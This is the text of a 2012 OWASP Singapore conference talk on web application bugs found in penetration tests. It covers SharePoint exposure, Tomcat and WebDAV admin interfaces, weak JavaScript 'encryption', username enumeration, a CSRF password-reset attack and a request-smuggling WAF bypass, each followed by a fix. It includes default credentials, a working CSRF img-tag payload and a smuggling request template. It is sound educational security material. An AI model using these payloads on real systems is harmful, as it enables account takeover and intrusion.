A Rojak of Singapore Web Exploits

Ryan Baxendale OWASP Singapore 14th November 2012

Who Am I?
I am Ryan I live in Singapore

Security Consultant at Security-Assessment.com

I find bugs in web applications and hack things

 Agenda Today's rojak includes bugs in

1. 2. 3. 4. 5. 6. Microsoft SharePoint Administrative Interfaces JavaScript Encryption Too Factor Authentication Password Reset 2 Requests Are Better Than 1 (Top10-A6-Security Misconfiguration) (Top10-A6-Security Misconfiguration) (Top10-A3-Broken Authentication) (Top10-A3-Broken Authentication) (XSRF + Horrible password reset) (WAF Bypass)

Microsoft SharePoint
Intranet content management and document management SharePoint can be used to provide:
intranet portals, document & file management, collaboration, social networks, extranets, websites, enterprise search, and business intelligence

'Publishing' feature can be used to manage larger public website

You might not know that site xyz is running on SharePoint

Microsoft SharePoint
Intranet content management and document management SharePoint can be used to provide:
intranet portals, document & file management, collaboration, social networks, extranets, websites, enterprise search, and business intelligence

'Publishing' feature can be used to manage larger public website

You might not know that site xyz is running on SharePoint

Microsoft SharePoint
Find additional functionality through the SharePoint site Try all the default or well know SharePoint pages:
/AllItems.aspx /Common.aspx /MyPage.aspx /recyclebin.aspx

Nice list from

Stach&Liu SharePoint Hacking Diggity Project

Also try to look for the admin web interface on a high port, although probably not available over internet due to firewall

Microsoft SharePoint
isaca.org/_layouts/mobile/mbllists.aspx
Username

Microsoft SharePoint
Upload your own page, edit pages
Links to internal team sites and other confidential things

Create a new page, edit a page

The user that created and modified this item

Microsoft SharePoint
Find list of user accounts, guess passwords, get access
All the site content, pages, things that should not be seen by the public, etc This is the list of users from Active Directory

I want to hack this account

Microsoft SharePoint
Dont have internal or confidential information on external facing SharePoint sites

Firewall admin port

ACL to block external IP addresses accessing SharePoint pages

Administrative Interfaces
Manage web applications and content on web servers
Admin interfaces let you run your own web shell

OWASP states the following objectives:

Administrator level functions are appropriately segregated from user activity Users cannot access or utilize administrator functionality (boring..) Provide necessary audit and traceability of administrative functionality

Administrative Interfaces
Usually on port 8080 (Apache Tomcat) Try default usernames and passwords (tomcat:tomcat, admin:tomcat, both:tomcat, manager:tomcat, etc)
Documentation, if you need help haxx0ring Upload metasploit payload

Links to admin interfaces

Administrative Interfaces
Create a metasploit payload
WAR file and upload

Administrative Interfaces
Create a metasploit payload
WAR file and upload

Administrative Interfaces
Create a metasploit payload
WAR file and upload

Administrative Interfaces
HTTP Methods (WebDAV)
PUT Put a file on the server, a web shell perhaps? DELETE Delete a file INDEX List the files PROPFIND Find files, discover backup files

IIS 6.0
WebDAV by default only supports static Web pages, not dynamic pages (ASP)

Administrative Interfaces
Generate metasploit payload
Fix the payload

Upload with Cadaver Run the payload

Administrative Interfaces
Generate metasploit payload
Fix the payload

Upload with Cadaver Run the payload

Administrative Interfaces
Password protected WebDAV methods
Nobody knew that the server had this functionality So nobody changed the password
Guess usernames and passwords with hydra/medusa then PUT a web shell

Administrative Interfaces
Find WebDAV enabled servers with metasploit

Administrative Interfaces
Dont let users connect to admin interfaces Firewall rules https://www.owasp.org/index.php/Administrative_Interface

JavaScript Encryption
JavaScript runs on the client side (browser)
<script> ... JavaScript ... </script>

JavaScript debuggers
Firebug (Firefox) Chrome developer tools Internet Explorer View source

JavaScript Encryption
Client: We dont use SSL/TLS because we have encrypted passwords
Implemented in JavaScript Takes the first character of the username/password ex. a and changes it to 23 Separates characters with 0 admin gets sent as 2305060340560, a = 23, d = 5, m = 6...

admin Seems like the password starts with admin too..

JavaScript Encryption
I broke your JavaScript encryption with a l33t BlackHat HaXx0r tool called...
Microsoft Excel

JavaScript Encryption
JavaScript with Public/Private key encryption
Hey ;) Heres my public key

User : AsianGirl2012 Password: ChickenRice1

Encrypt( Public Key , Credentials )

User : J#^ZML@)*FMA& Password: acE($2mvT$^m!fG

Decrypt( Private Key , Credentials )

???
Where is the chicken rice?

User : AsianGirl2012 Password: ChickenRice1

JavaScript Encryption
A substitution cipher is not encryption JavaScript makes secret keys visible to the user Use public/private key encryption in JavaScript

Too Factor Authentication

Two-factor authentication requires the use of two of the three authentication factors:
Something the user knows (password, PIN); Something the user has (ATM card, smart card); and Something the user is (biometric characteristic, such as a fingerprint)

Most of the time it ends up being knows (password) and has (token) Too factor authentication is...

Too Factor Authentication

First login/signup for Too factor authentication Login with Too factor authentication

Too Factor Authentication

First login/signup for Too factor authentication Login with Too factor authentication

Too Factor Authentication

First login/signup for Too factor authentication Login with Too factor authentication

Too Factor Authentication

First login/signup for Too factor authentication Login with Too factor authentication

Verbose error message and step by step authentication

Too Factor Authentication

Find a list of common names for the typical customers Aban Burp Intruder
Send every name as the username Look at the response
Abbas Abbud Abbudin Abdul Abdel Abdal Abdul Adl Abdul-Ahad Abdul-Alim Abdul-Aliyy Abdul-Azim Abdul-Aziz

Now we know all the usernames Continue by doing the same thing on the next step of this broken authentication

Too Factor Authentication

But wait theres more

Too Factor Authentication

Some things are just not the same 2FA is a combination of two: know, have, is

Password Reset
Password reset
Typically an admin function to change a users password to a randomly generate password and securely transmit the new password to the user

A typical reset password page for a user

Asks for email/username, maybe a secret question Sends unique password reset link to email address

A typical change password page

Asks for old password, new password, confirm your new password

Password Reset
Once upon a time a lazy developer needed to create a reset password page
Lets just take the change password page and make a few changes Great idea!......for pen testers

If a typical change password page takes username (from session), old password, new password and confirmed new password as input...
Creating a password reset page would only need the following input: username and new password

Password Reset
Password reset page accepted the following:
Hidden input, useraccount to administrator because we are the admin right? Hidden input, oldPassword to administrator Set Password and confirmpasswd to the new password Set userID to the victims username

Lets get access to the admin account with Cross Site Request Forgery (XSRF/CSRF)
Create a image tag with a request to change the password

<img src="https://website/LoginServlet?action=resetpassword&user account=administrator&oldPassword=administrator&Passwor d=password4444&confirmpasswd=password4444&userID=ad ministrator&CALLER=" />

Password Reset
To get it working: Admin needs to view a page with the CSRF img tag Must be logged into the application in the same web browser Possible ways to share your img tag Web forum Profile signature Create a note with HTML editor (tinymce) Send a personal message You get to login as Administrator with password4444

Password Reset
Dont be a lazy developer

2 Requests Are Better Than 1

One day I was testing a web application
It gets tested often And by lots of different people/companies

So at this point its one of the most boring (secure) applications a pen tester can come across

2 Requests Are Better Than 1

I found a directory traversal bug where I request for /app/test../../../ and I get a directory listing

This wasnt too interesting because I could only see the directory listing, but never access those files or folders
Something strange was going on...

2 Requests Are Better Than 1

Then using Burp Intruder with a list of common files and folders (such as the dirBuster wordlist)
Found /app/test../../../console

2 Requests Are Better Than 1

This bug was only in the UAT environment
I need to get this bug working in production

There's a web application firewall (WAF) that looks at all the requests and decides if they should be forwarded on to the web server
So how do we trick the WAF into forwarding anything

But the client has a WAF, so theyre safe right?...

2 Requests Are Better Than 1

Theres a strange bug in a few webservers
Reports indicate that Microsoft IIS 5.0 truncates requests that contain a body of greater than 48 KB in length. After 49152 bytes of a request body are handled, IIS terminates the request and starts to parse a new request. (1) There appears to be a bug strangely, IIS/5.0 silently truncates the body after 48K (49,152 bytes) we can smuggle a request in the last x bytes of the body. (2) If the size of the request exceeds a particular threshold (by default, 48 KB), then the ISAPI or CGI code to which the request is directed needs to be aware of chunked-transfer encoding to process the request correctly. (3)
(1) - www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21219 (2) - www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf (3) - hostingadministration.blogspot.sg/2008/01/urlscan-security-tool-faq.html

2 Requests Are Better Than 1

A basic HTTP POST request before smuggling:
POST /crosstraining/aboutyou2.php HTTP/1.1 Host: www.webscantest.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.webscantest.com/crosstraining/aboutyou2.php Cookie: SESSIONID_VULN_SITE=4vdvho53o3vk9tjr94lks786q3 Content-Type: application/x-www-form-urlencoded Content-Length: 84 returnto=aboutyou2.php&fname=Ryan&nick=Security-Assessment&lname=OWASP&submit=submit

2 Requests Are Better Than 1

The idea is to send one big evil request, and a normal request directly after it The big evil request has to be more than 48kb
We have to include what we need to send (parameters etc) Then fill the rest of the space with garbage
POST /test../../../console/adminlogin.jsp HTTP/1.1 Host: . Content-length: 49152 username=admin&password=admin&ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage GET /happy.nice.users.normal.page.jsp HTTP/1.1 Host:

2 Requests Are Better Than 1

Uncheck Update Content-Length We want to manually specify that its a bit more than 48kb This is our malicious request

48kb in bytes is 49152. The first request must be larger than 48kb, and the content-length must be larger than 48kb
Now we fill the request with 48kb of garbage This is our normal request that returns 404, but allows us to get our evil request to the web server

-----------------------(snip)------------------------

2 Requests Are Better Than 1

Response from the server
As if we sent a normal request

Probably using IIS 5 or 6 with custom ISAPI filters or an appliance such as CheckPoint FW-1 with Web Intelligence

2 Requests Are Better Than 1

Now lets login
Username and password to login

Login error Wrong user and password

Burp Intruder to the rescue! Brute force the password for admin

2 Requests Are Better Than 1

Winning!

Lets deploy our own web app and get shell :D

2 Requests Are Better Than 1

Dont rely on a web app firewall (WAF) to fix web app vulnerabilities Fix the code

WAF

Recap
Microsoft SharePoint
Keep internal and external sites separate

Administrative Interfaces
Dont let users connect to them, change default passwords

JavaScript Encryption
Dont use your own encryption, use public/private key crypto

Too Factor Authentication

Remove verbosity from error messages, find out what 2FA is

Password Reset
Dont be a lazy developer

2 Requests Are Better Than 1

A web app firewall (WAF) doesnt fix broken code, fix the code

Questions? Comments
Contact:
ryan.baxendale@security-assessment.com

?
Think you can hack? Got talent? We are hiring!
Invite more people to OWASP meetings Sign up and be active on the OWASP Singapore mailing list
https://lists.owasp.org/mailman/listinfo/owasp-singapore